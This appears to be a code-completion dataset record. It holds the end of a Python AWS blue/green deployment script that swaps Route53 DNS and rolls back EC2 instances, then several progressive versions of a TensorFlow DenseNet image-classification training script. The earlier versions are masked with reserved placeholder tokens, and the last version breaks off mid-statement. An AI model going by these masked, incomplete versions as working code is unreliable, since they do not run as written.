EC2 service\n old_tag: Dictionary with <tag_name> <tag_value> pair\n dry-run: True or False. If True, it will not make any changes.\n :return: boolean status\n \"\"\"\n result = True\n\n # 1. Connects to AWS\n aws_conn = connect_to_aws(region, access_key, secret_key)\n\n # 2. Check which is live at the moment and which should be stopped.\n live = check_which_is_live(aws_conn.get('route53'), domain, live_url)\n\n # 3. Swap DNS\n result = swap_live_with_staging(aws_conn, domain, live, live_url, blue_alias, green_alias, dry_run)\n\n # 4. Stop and tag old one. We will do it after 5 minutes to give chance to safely close all connections.\n time.sleep(300)\n stop_instance(aws_conn, get_env(live, domain), domain, live_url, tag, dry_run)\n\n return result\n\n\ndef roll_back(region, access_key, secret_key, tag, domain, live_alias, blue_alias, green_alias, dry_run=False):\n \"\"\"\n :description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.\n :param\n ec2_conn: Connection to AWS EC2 service\n old_tag: Dictionary with <tag_name> <tag_value> pair\n dry-run: True or False. If True, it will not make any changes.\n :return: boolean status\n \"\"\"\n result = True\n\n # 1. Connects to AWS\n aws_conn = connect_to_aws(region, access_key, secret_key)\n\n # 2. Get instance ID of old instance. Check which environment is live.\n old_instance = get_specific_instances(aws_conn.get('ec2'), ''.join(tag.keys()), ''.join(tag.values()),\n ['stopped', 'running'])\n current_live = check_which_is_live(aws_conn.get('route53'), domain, live_alias)\n env = get_env(current_live, domain)\n\n # 3. Do the Magic ;)\n if not old_instance:\n LOGGER.error('No instance with tag %s was found. No chance to roll back Sir!' 
% ''.join(tag.values()))\n else:\n try:\n if dry_run:\n LOGGER.warning('Instance %s would be started and tagged with %s' % (old_instance, env))\n else:\n # Start old instance\n old_instance[0].start()\n tag_instance(old_instance[0], 'Environment', 'blue' if env == 'green' else 'green')\n\n # Refresh its public IP as it could change.\n instance_public_ip = wait_for_public_ip(aws_conn.get('ec2'), old_instance[0].id)\n\n assign_to_staging(aws_conn.get('route53'), domain, current_live, instance_public_ip, live_alias,\n blue_alias, green_alias, dry_run=False)\n swap_live_with_staging(aws_conn, domain, current_live, live_alias, blue_alias, green_alias, dry_run)\n stop_instance(aws_conn, env, domain, live_alias, tag, dry_run)\n except exception.EC2ResponseError:\n LOGGER.error('Could not start %s instance.' % old_instance)\n result = False\n\n return result\n\n\ndef deployment_stage(region, access_key, secret_key, srv_name, domain, live_url, blue_alias, green_alias, tag, image_id,\n ssh_key, sec_group, subnet_id, instance_size, shutdown, dry_run=False):\n \"\"\"\n :description: Delivers new instance with staging dns (blue / green).\n :param\n region: region to which you want to deploy your instance\n access_key: AWS Access Key\n secret_key: AWS Secret Key\n srv_name: How you want to call your web server\n domain: Your domain\n live_url: DNS record for your live website\n blue_url: Blue Url\n green_url: Green Url\n old_tag: Dictionary with <tag_name> <tag_value> pair\n image_id: Amazon Machine Image ID with all your software\n ssh_key: AWS key pair name\n sec_group: Security group ID that should be allocated\n subnet_id: Subnet ID in which your instance should be created\n instance_size: String with instance size\n shutdown_behaviour: stop or termination\n dry-run: True or False. If True, it will not make any changes.\n :return: string with url and ip address to staging server\n \"\"\"\n # 1. Connects to AWS\n aws_connections = connect_to_aws(region, access_key, secret_key)\n\n # 2. Delete old instance which should be stopped\n deleted = delete_old_instance(aws_connections.get('ec2'), tag, dry_run)\n\n # 3. Check which environment (blue/green) is live\n live = check_which_is_live(aws_connections.get('route53'), domain, live_url)\n if live == blue_alias:\n env = 'green'\n else:\n env = 'blue'\n\n # 4. If deleted then we can create new instance\n if dry_run:\n # Dry Run\n create_new_instance(aws_connections.get('ec2'), image_id, ssh_key, sec_group, subnet_id, env, srv_name, None,\n instance_size, shutdown, dry_run)\n assign_to_staging(aws_connections.get('route53'), domain, live, \"127.0.0.1\", live_url, blue_alias,\n green_alias, dry_run)\n\n sys.exit(0)\n elif deleted:\n staging_instance = create_new_instance(aws_connections.get('ec2'), image_id, ssh_key, sec_group, subnet_id, env,\n srv_name, None, instance_size, shutdown, dry_run)\n\n # 5. Assign right dns alias only if we managed to create instance in previous step\n if staging_instance is None:\n # There were some problems with creating new instance\n LOGGER.error('Could not create new instance.')\n sys.exit(1)\n else:\n # Everything was all right. Waiting for Public IP\n if staging_instance[0].ip_address is None:\n # Unfortunately Public IP is not available straight away so we have to wait for it.\n public_ip = wait_for_public_ip(aws_connections.get('ec2'), staging_instance[0].id)\n\n if public_ip is None:\n LOGGER.error('Cannot get Public IP from instance %s' % staging_instance[0].id)\n sys.exit(1)\n else:\n # Or maybe it is? 
:)\n public_ip = staging_instance[0].ip_address\n\n assign_to_staging(aws_connections.get('route53'), domain, live, public_ip, live_url, blue_alias, green_alias,\n dry_run)\n\n write_to_file(\"staging-server = \" + public_ip)\n\n return str(env + \".\" + domain + \": \" + public_ip)\n\nLOGGER = set_up_logging(log_path, file_name)\n",
"step-ids": [
1,
10,
14,
15,
23
]
}
|
[
1,
10,
14,
15,
23
] |
<|reserved_special_token_0|>
class MyModel:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MyModel:
num_layers = 4
k_fm = 24
fs = 3
fm1 = 32
bottleneck = 4
dropout_prob = 0.8
batch_size = [16]
learn_rate = 0.001
num_of_test = 40
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def densenet(D, DT, F, model):
import scipy.io as sio
import time
import os
import math
import numpy as np
import matplotlib.pyplot as plt
Dataset = D
if DT == 'org':
data_type = 'original'
else:
data_type = 'augmented'
fs = model.fs
fm1 = model.fm1
batch_size = model.batch_size[0]
learn_rate = model.learn_rate
num_layers = model.num_layers
k_fm = model.k_fm
bottleneck = model.bottleneck
dropout_prob = model.dropout_prob
num_of_test = model.num_of_test
if F == 1:
file_name = '1st_fold'
elif F == 2:
file_name = '2nd_fold'
elif F == 3:
file_name = '3rd_fold'
elif F == 4:
file_name = '4th_fold'
elif F == 5:
file_name = '5th_fold'
path = os.path.join('CrossVal', 'D' + Dataset)
print('path ', path)
if data_type == 'original':
Train = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' +
file_name + '_train.mat'))
else:
Train = sio.loadmat(os.path.join(path, 'Augmented_D' + Dataset +
'_' + file_name + '_train.mat'))
Test = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' + file_name +
'_test.mat'))
if Dataset == '1':
number_of_classes = 24
num_of_ep = 50
num_of_test = 20
if data_type == 'augmented':
train_imgs = 526190
else:
train_imgs = 52619
iteration = math.ceil(num_of_ep * train_imgs / batch_size)
elif Dataset == '2':
number_of_classes = 36
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 20120
else:
train_imgs = 2012
iteration = math.ceil(num_of_ep * train_imgs / batch_size)
else:
number_of_classes = 10
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 16000
else:
train_imgs = 1600
iteration = math.ceil(num_of_ep * train_imgs / batch_size)
iteration_to_display = int(iteration / num_of_test)
list_to_display = []
for i in range(num_of_test):
if i != num_of_test:
list_to_display.append(int(iteration_to_display * (i + 1)))
del i
total_fm_Block_1 = fm1 + num_layers * k_fm
total_fm_Block_2 = total_fm_Block_1 + num_layers * k_fm
total_fm_Block_3 = total_fm_Block_2 + num_layers * k_fm
fc_nodes = [total_fm_Block_3]
Train_Images = Train['trainImages']
Train_Labels = Train['trainLabels2']
total_trainImages = len(Train_Images[0, 2])
print(total_trainImages)
Train_Images = Train_Images.reshape(784, total_trainImages).transpose(
).astype('float32')
Train_Labels = Train_Labels.transpose().astype('float64')
Test_Images = Test['testImages']
Test_Labels = Test['testLabels2']
total_testImages = len(Test_Images[0, 2])
Test_Images = Test_Images.reshape(784, total_testImages).transpose(
).astype('float32')
Test_Labels = Test_Labels.transpose().astype('float64')
Target_labels = np.argmax(Test_Labels, axis=1)
del Test
del Train
import tensorflow as tf
tf.reset_default_graph()
g = tf.Graph()
with g.as_default():
tf.set_random_seed(1)
def weight_variable(shape, n):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial, name=n)
def bias_variable(shape, n):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial, name=n)
def avg_pool(input, s):
return tf.nn.avg_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')
def max_pool(input, s):
return tf.nn.max_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')
def conv2d_1(input, in_features, out_features, kernel_size, name=
'W', with_bias=False):
W = weight_variable([kernel_size, kernel_size, in_features,
out_features], name)
conv = tf.nn.conv2d(input, W, [1, 1, 1, 1], padding='SAME')
if with_bias:
                return conv + bias_variable([out_features], name + '_b')  # bias_variable requires a name argument
return conv
def batch_activ_conv(current, in_features, out_features,
kernel_size, is_training, keep_prob, idx, scope='conv_block'):
with tf.variable_scope(scope):
current = tf.layers.batch_normalization(current, scale=True,
training=is_training)
current = tf.nn.relu(current)
current = conv2d_1(current, in_features, out_features,
kernel_size, name='W' + str(idx))
current = tf.nn.dropout(current, keep_prob)
return current
def block(input, layers, in_features, growth, is_training,
keep_prob, name='Block_'):
with tf.name_scope(name):
with tf.variable_scope(name):
current = input
features = in_features
for idx in range(layers):
tmp = batch_activ_conv(current, features, growth,
fs, is_training, keep_prob, idx + 1, scope=
'conv_block_' + str(idx + 1))
current = tf.concat((current, tmp), axis=3)
features += growth
return current, features
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])
x_image = tf.reshape(x, [-1, 28, 28, 1])
keep_prob = tf.placeholder(tf.float32)
training = tf.placeholder(tf.bool)
current = conv2d_1(x_image, 1, fm1, fs, name='W1', with_bias=False)
current, features = block(current, num_layers, fm1, k_fm, training,
keep_prob, name='Block_1')
b1_conv_printop = tf.Print(current, [current])
with tf.name_scope('transition_lyr'):
current = batch_activ_conv(current, features, bottleneck * k_fm,
1, training, keep_prob, 1, scope='Transition_layer_1')
t1_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck * k_fm, features,
fs, training, keep_prob, 1, scope='Transition_layer_1_1')
t1_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
current, features = block(current, num_layers, features, k_fm,
training, keep_prob, name='Block_2')
b2_conv_printop = tf.Print(current, [current])
with tf.name_scope('transition_lyr_2'):
current = batch_activ_conv(current, features, bottleneck * k_fm,
1, training, keep_prob, 1, scope='Transition_layer_2')
t2_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck * k_fm, features,
fs, training, keep_prob, 1, scope='Transition_layer_2_1')
t2_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
current, features = block(current, num_layers, features, k_fm,
training, keep_prob, name='Block_3')
b3_conv_printop = tf.Print(current, [current])
with tf.name_scope('transition_lyr_3'):
current = batch_activ_conv(current, features, bottleneck * k_fm,
1, training, keep_prob, 1, scope='Transition_layer_3')
t3_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck * k_fm, features,
fs, training, keep_prob, 1, scope='Transition_layer_3_1')
t3_conv_printop = tf.Print(current, [current])
current = avg_pool(current, 7)
current = tf.reshape(current, [tf.shape(current)[0], -1])
with tf.name_scope('Dense_Last_lyr'):
W_fc3 = weight_variable([fc_nodes[0], number_of_classes], 'w_fc3')
b_fc3 = bias_variable([number_of_classes], 'b_fc3')
y_conv = tf.matmul(current, W_fc3) + b_fc3
prediction_prob = tf.nn.softmax(y_conv)
prediction_prob_printop = tf.Print(prediction_prob, [
prediction_prob])
with tf.name_scope('Xent'):
cross_entropy = tf.reduce_mean(tf.nn.
softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))
with tf.name_scope('train'):
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
train_step = tf.train.AdamOptimizer(learn_rate).minimize(
cross_entropy)
with tf.name_scope('accuracy'):
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(
y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax
(y_, 1))
wrong_prediction_printop = tf.Print(wrong_prediction, [
wrong_prediction])
predicted_labels = tf.argmax(y_conv, 1)
predicted_labels_printop = tf.Print(predicted_labels, [
predicted_labels])
index = 0
index_end = index + batch_size
remaining = 0
start_time = time.time()
costs = []
accuracy_list = []
list_of_predicted_list = []
with tf.Session() as sess:
            # tf.set_random_seed(0) was being passed as feed_dict here (a no-op); the graph seed is already set above.
            sess.run(tf.global_variables_initializer())
for i in range(iteration):
if index_end > total_trainImages:
remaining = total_trainImages - (index_end - batch_size)
images = Train_Images[index_end - batch_size:
total_trainImages, :]
labels = Train_Labels[index_end - batch_size:
total_trainImages, :]
index = 0
index_end = index + batch_size - remaining
images = np.vstack((images, Train_Images[index:
index_end, :]))
labels = np.vstack((labels, Train_Labels[index:
index_end, :]))
batch = images, labels
index = index_end
index_end = index + batch_size
else:
batch = Train_Images[index:index_end, :], Train_Labels[
index:index_end, :]
index = index + batch_size
index_end = index_end + batch_size
if i in list_to_display:
elapsed_time = time.time() - start_time
print('Elapsed Time Before for loop: %f secs' %
elapsed_time)
Accuracy = 0
itrt_index = i
print('debug: %d & %d' % (iteration, i))
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index, :]).reshape(
1, 784)
t_label = np.array(Test_Labels[img_index, :]).reshape(
1, number_of_classes)
test_acc = accuracy.eval(feed_dict={x: t_image, y_:
t_label, keep_prob: 1.0, training: False})
Accuracy += test_acc
wrong, predicted, prediction_prob = sess.run([
wrong_prediction_printop,
predicted_labels_printop,
prediction_prob_printop], feed_dict={x: t_image,
y_: t_label, keep_prob: 1.0, training: False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = (sess
.run([b1_conv_printop, b2_conv_printop,
b3_conv_printop, t1_conv_printop,
t2_conv_printop, t3_conv_printop,
t1_b_conv_printop, t2_b_conv_printop,
t3_b_conv_printop], feed_dict={x: t_image,
y_: t_label, keep_prob: 1.0, training: False}))
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list, b1, axis=0)
b2_list = np.append(b2_list, b2, axis=0)
b3_list = np.append(b3_list, b3, axis=0)
t1_list = np.append(t1_list, t1, axis=0)
t2_list = np.append(t2_list, t2, axis=0)
t3_list = np.append(t3_list, t3, axis=0)
t1_b_list = np.append(t1_b_list, t1_b, axis=0)
t2_b_list = np.append(t2_b_list, t2_b, axis=0)
t3_b_list = np.append(t3_b_list, t3_b, axis=0)
if img_index == 0:
wrong_list_1 = wrong
predicted_list_1 = predicted
prediction_prob_1 = prediction_prob
else:
wrong_list_1 = np.append(wrong_list_1, wrong,
axis=0)
predicted_list_1 = np.append(predicted_list_1,
predicted, axis=0)
prediction_prob_1 = np.append(prediction_prob_1,
prediction_prob)
Accuracy = Accuracy / num_test
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list_1)
print('Average test accuracy: %g' % Accuracy)
epoch_around = math.ceil(itrt_index * batch_size /
total_trainImages)
                # save the accumulated per-image probabilities, not just the last image's
                sio.savemat('D' + Dataset + '_' + file_name + '_' + str
                    (epoch_around) + 'ep_' + data_type +
                    '_predicted_labels_list.mat', {'wrong_list':
                    wrong_list_1, 'predicted_list': predicted_list_1,
                    'Target_labels': Target_labels, 'prediction_prob':
                    prediction_prob_1, 'b1_list': b1_list, 'b2_list':
                    b2_list, 'b3_list': b3_list, 't1_list': t1_list,
                    't2_list': t2_list, 't3_list': t3_list, 't1_b_list':
                    t1_b_list, 't2_b_list': t2_b_list, 't3_b_list':
                    t3_b_list})
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
print(
'Batch Size & Iteration & Total Train Imgs : %d & %d & %d'
% (batch_size, itrt_index, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = itrt_index * batch_size / total_trainImages
print('Number of epochs : %f ' % epoch_around)
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title('Learning rate =' + str(learn_rate))
plt.show()
if i % 100 == 0:
train_accuracy = accuracy.eval(feed_dict={x: batch[0],
y_: batch[1], keep_prob: 1.0, training: False})
print('step %d, training accuracy %g' % (i, train_accuracy)
)
_, loss = sess.run([train_step, cross_entropy], feed_dict={
x: batch[0], y_: batch[1], keep_prob: dropout_prob,
training: True})
iteration_cost = 0
num_minibatches = int(total_trainImages / batch_size)
iteration_cost += loss / num_minibatches
costs.append(iteration_cost)
if i % 100 == 0:
print('Loss: ', loss)
Accuracy = 0
training_time = time.time() - start_time
print('Training Time: %f secs' % training_time)
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index, :]).reshape(1, 784)
t_label = np.array(Test_Labels[img_index, :]).reshape(1,
number_of_classes)
test_acc = accuracy.eval(feed_dict={x: t_image, y_: t_label,
keep_prob: 1.0, training: False})
Accuracy += test_acc
wrong, predicted = sess.run([wrong_prediction_printop,
predicted_labels_printop], feed_dict={x: t_image, y_:
t_label, keep_prob: 1.0, training: False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([
b1_conv_printop, b2_conv_printop, b3_conv_printop,
t1_conv_printop, t2_conv_printop, t3_conv_printop,
t1_b_conv_printop, t2_b_conv_printop,
t3_b_conv_printop], feed_dict={x: t_image, y_:
t_label, keep_prob: 1.0, training: False})
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list, b1, axis=0)
b2_list = np.append(b2_list, b2, axis=0)
b3_list = np.append(b3_list, b3, axis=0)
t1_list = np.append(t1_list, t1, axis=0)
t2_list = np.append(t2_list, t2, axis=0)
t3_list = np.append(t3_list, t3, axis=0)
t1_b_list = np.append(t1_b_list, t1_b, axis=0)
t2_b_list = np.append(t2_b_list, t2_b, axis=0)
t3_b_list = np.append(t3_b_list, t3_b, axis=0)
if img_index == 0:
wrong_list = wrong
predicted_list = predicted
else:
wrong_list = np.append(wrong_list, wrong, axis=0)
predicted_list = np.append(predicted_list, predicted,
axis=0)
Accuracy = Accuracy / num_test
print('Average test accuracy: %g' % Accuracy)
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list)
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
print(
'Batch Size & Iteration & Total Train Imgs : %d & %d & %d' %
(batch_size, itrt_index, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = math.ceil(iteration * batch_size / total_trainImages
)
if epoch_around == 51:
epoch_around = 50
print('Number of epochs : %f ' % epoch_around)
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title('Learning rate =' + str(learn_rate))
plt.show()
sio.savemat('D' + Dataset + '_' + file_name + '_' + str(
epoch_around) + 'ep_' + data_type +
'_predicted_labels_list.mat', {'wrong_list': wrong_list,
'predicted_list': predicted_list, 'Target_labels':
Target_labels, 'accuracy_list': accuracy_list,
'list_of_predicted_list': list_of_predicted_list, 'costs':
costs, 'b1_list': b1_list, 'b2_list': b2_list, 'b3_list':
b3_list, 't1_list': t1_list, 't2_list': t2_list, 't3_list':
t3_list, 't1_b_list': t1_b_list, 't2_b_list': t2_b_list,
't3_b_list': t3_b_list})
class MyModel:
num_layers = 4
k_fm = 24
fs = 3
fm1 = 32
bottleneck = 4
dropout_prob = 0.8
batch_size = [16]
learn_rate = 0.001
num_of_test = 40
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def densenet(D, DT, F, model):
import scipy.io as sio
import time
import os
import math
import numpy as np
import matplotlib.pyplot as plt
Dataset = D
if DT == 'org':
data_type = 'original'
else:
data_type = 'augmented'
fs = model.fs
fm1 = model.fm1
batch_size = model.batch_size[0]
learn_rate = model.learn_rate
num_layers = model.num_layers
k_fm = model.k_fm
bottleneck = model.bottleneck
dropout_prob = model.dropout_prob
num_of_test = model.num_of_test
if F == 1:
file_name = '1st_fold'
elif F == 2:
file_name = '2nd_fold'
elif F == 3:
file_name = '3rd_fold'
elif F == 4:
file_name = '4th_fold'
elif F == 5:
file_name = '5th_fold'
path = os.path.join('CrossVal', 'D' + Dataset)
print('path ', path)
if data_type == 'original':
Train = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' +
file_name + '_train.mat'))
else:
Train = sio.loadmat(os.path.join(path, 'Augmented_D' + Dataset +
'_' + file_name + '_train.mat'))
Test = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' + file_name +
'_test.mat'))
if Dataset == '1':
number_of_classes = 24
num_of_ep = 50
num_of_test = 20
if data_type == 'augmented':
train_imgs = 526190
else:
train_imgs = 52619
iteration = math.ceil(num_of_ep * train_imgs / batch_size)
elif Dataset == '2':
number_of_classes = 36
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 20120
else:
train_imgs = 2012
iteration = math.ceil(num_of_ep * train_imgs / batch_size)
else:
number_of_classes = 10
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 16000
else:
train_imgs = 1600
iteration = math.ceil(num_of_ep * train_imgs / batch_size)
iteration_to_display = int(iteration / num_of_test)
list_to_display = []
for i in range(num_of_test):
if i != num_of_test:
list_to_display.append(int(iteration_to_display * (i + 1)))
del i
total_fm_Block_1 = fm1 + num_layers * k_fm
total_fm_Block_2 = total_fm_Block_1 + num_layers * k_fm
total_fm_Block_3 = total_fm_Block_2 + num_layers * k_fm
fc_nodes = [total_fm_Block_3]
Train_Images = Train['trainImages']
Train_Labels = Train['trainLabels2']
total_trainImages = len(Train_Images[0, 2])
print(total_trainImages)
Train_Images = Train_Images.reshape(784, total_trainImages).transpose(
).astype('float32')
Train_Labels = Train_Labels.transpose().astype('float64')
Test_Images = Test['testImages']
Test_Labels = Test['testLabels2']
total_testImages = len(Test_Images[0, 2])
Test_Images = Test_Images.reshape(784, total_testImages).transpose(
).astype('float32')
Test_Labels = Test_Labels.transpose().astype('float64')
Target_labels = np.argmax(Test_Labels, axis=1)
del Test
del Train
import tensorflow as tf
tf.reset_default_graph()
g = tf.Graph()
with g.as_default():
tf.set_random_seed(1)
def weight_variable(shape, n):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial, name=n)
def bias_variable(shape, n):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial, name=n)
def avg_pool(input, s):
return tf.nn.avg_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')
def max_pool(input, s):
return tf.nn.max_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')
def conv2d_1(input, in_features, out_features, kernel_size, name=
'W', with_bias=False):
W = weight_variable([kernel_size, kernel_size, in_features,
out_features], name)
conv = tf.nn.conv2d(input, W, [1, 1, 1, 1], padding='SAME')
if with_bias:
                return conv + bias_variable([out_features], name + '_b')  # bias_variable requires a name argument
return conv
def batch_activ_conv(current, in_features, out_features,
kernel_size, is_training, keep_prob, idx, scope='conv_block'):
with tf.variable_scope(scope):
current = tf.layers.batch_normalization(current, scale=True,
training=is_training)
current = tf.nn.relu(current)
current = conv2d_1(current, in_features, out_features,
kernel_size, name='W' + str(idx))
current = tf.nn.dropout(current, keep_prob)
return current
def block(input, layers, in_features, growth, is_training,
keep_prob, name='Block_'):
with tf.name_scope(name):
with tf.variable_scope(name):
current = input
features = in_features
for idx in range(layers):
tmp = batch_activ_conv(current, features, growth,
fs, is_training, keep_prob, idx + 1, scope=
'conv_block_' + str(idx + 1))
current = tf.concat((current, tmp), axis=3)
features += growth
return current, features
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])
x_image = tf.reshape(x, [-1, 28, 28, 1])
keep_prob = tf.placeholder(tf.float32)
training = tf.placeholder(tf.bool)
current = conv2d_1(x_image, 1, fm1, fs, name='W1', with_bias=False)
current, features = block(current, num_layers, fm1, k_fm, training,
keep_prob, name='Block_1')
b1_conv_printop = tf.Print(current, [current])
with tf.name_scope('transition_lyr'):
current = batch_activ_conv(current, features, bottleneck * k_fm,
1, training, keep_prob, 1, scope='Transition_layer_1')
t1_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck * k_fm, features,
fs, training, keep_prob, 1, scope='Transition_layer_1_1')
t1_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
current, features = block(current, num_layers, features, k_fm,
training, keep_prob, name='Block_2')
b2_conv_printop = tf.Print(current, [current])
with tf.name_scope('transition_lyr_2'):
current = batch_activ_conv(current, features, bottleneck * k_fm,
1, training, keep_prob, 1, scope='Transition_layer_2')
t2_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck * k_fm, features,
fs, training, keep_prob, 1, scope='Transition_layer_2_1')
t2_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
current, features = block(current, num_layers, features, k_fm,
training, keep_prob, name='Block_3')
b3_conv_printop = tf.Print(current, [current])
with tf.name_scope('transition_lyr_3'):
current = batch_activ_conv(current, features, bottleneck * k_fm,
1, training, keep_prob, 1, scope='Transition_layer_3')
t3_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck * k_fm, features,
fs, training, keep_prob, 1, scope='Transition_layer_3_1')
t3_conv_printop = tf.Print(current, [current])
current = avg_pool(current, 7)
current = tf.reshape(current, [tf.shape(current)[0], -1])
with tf.name_scope('Dense_Last_lyr'):
W_fc3 = weight_variable([fc_nodes[0], number_of_classes], 'w_fc3')
b_fc3 = bias_variable([number_of_classes], 'b_fc3')
y_conv = tf.matmul(current, W_fc3) + b_fc3
prediction_prob = tf.nn.softmax(y_conv)
prediction_prob_printop = tf.Print(prediction_prob, [
prediction_prob])
with tf.name_scope('Xent'):
cross_entropy = tf.reduce_mean(tf.nn.
softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))
with tf.name_scope('train'):
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
train_step = tf.train.AdamOptimizer(learn_rate).minimize(
cross_entropy)
with tf.name_scope('accuracy'):
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(
y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax
(y_, 1))
wrong_prediction_printop = tf.Print(wrong_prediction, [
wrong_prediction])
predicted_labels = tf.argmax(y_conv, 1)
predicted_labels_printop = tf.Print(predicted_labels, [
predicted_labels])
index = 0
index_end = index + batch_size
remaining = 0
start_time = time.time()
costs = []
accuracy_list = []
list_of_predicted_list = []
with tf.Session() as sess:
            # tf.set_random_seed(0) was being passed as feed_dict here (a no-op); the graph seed is already set above.
            sess.run(tf.global_variables_initializer())
for i in range(iteration):
if index_end > total_trainImages:
remaining = total_trainImages - (index_end - batch_size)
images = Train_Images[index_end - batch_size:
total_trainImages, :]
labels = Train_Labels[index_end - batch_size:
total_trainImages, :]
index = 0
index_end = index + batch_size - remaining
images = np.vstack((images, Train_Images[index:
index_end, :]))
labels = np.vstack((labels, Train_Labels[index:
index_end, :]))
batch = images, labels
index = index_end
index_end = index + batch_size
else:
batch = Train_Images[index:index_end, :], Train_Labels[
index:index_end, :]
index = index + batch_size
index_end = index_end + batch_size
if i in list_to_display:
elapsed_time = time.time() - start_time
print('Elapsed Time Before for loop: %f secs' %
elapsed_time)
Accuracy = 0
itrt_index = i
print('debug: %d & %d' % (iteration, i))
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index, :]).reshape(
1, 784)
t_label = np.array(Test_Labels[img_index, :]).reshape(
1, number_of_classes)
test_acc = accuracy.eval(feed_dict={x: t_image, y_:
t_label, keep_prob: 1.0, training: False})
Accuracy += test_acc
wrong, predicted, prediction_prob = sess.run([
wrong_prediction_printop,
predicted_labels_printop,
prediction_prob_printop], feed_dict={x: t_image,
y_: t_label, keep_prob: 1.0, training: False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = (sess
.run([b1_conv_printop, b2_conv_printop,
b3_conv_printop, t1_conv_printop,
t2_conv_printop, t3_conv_printop,
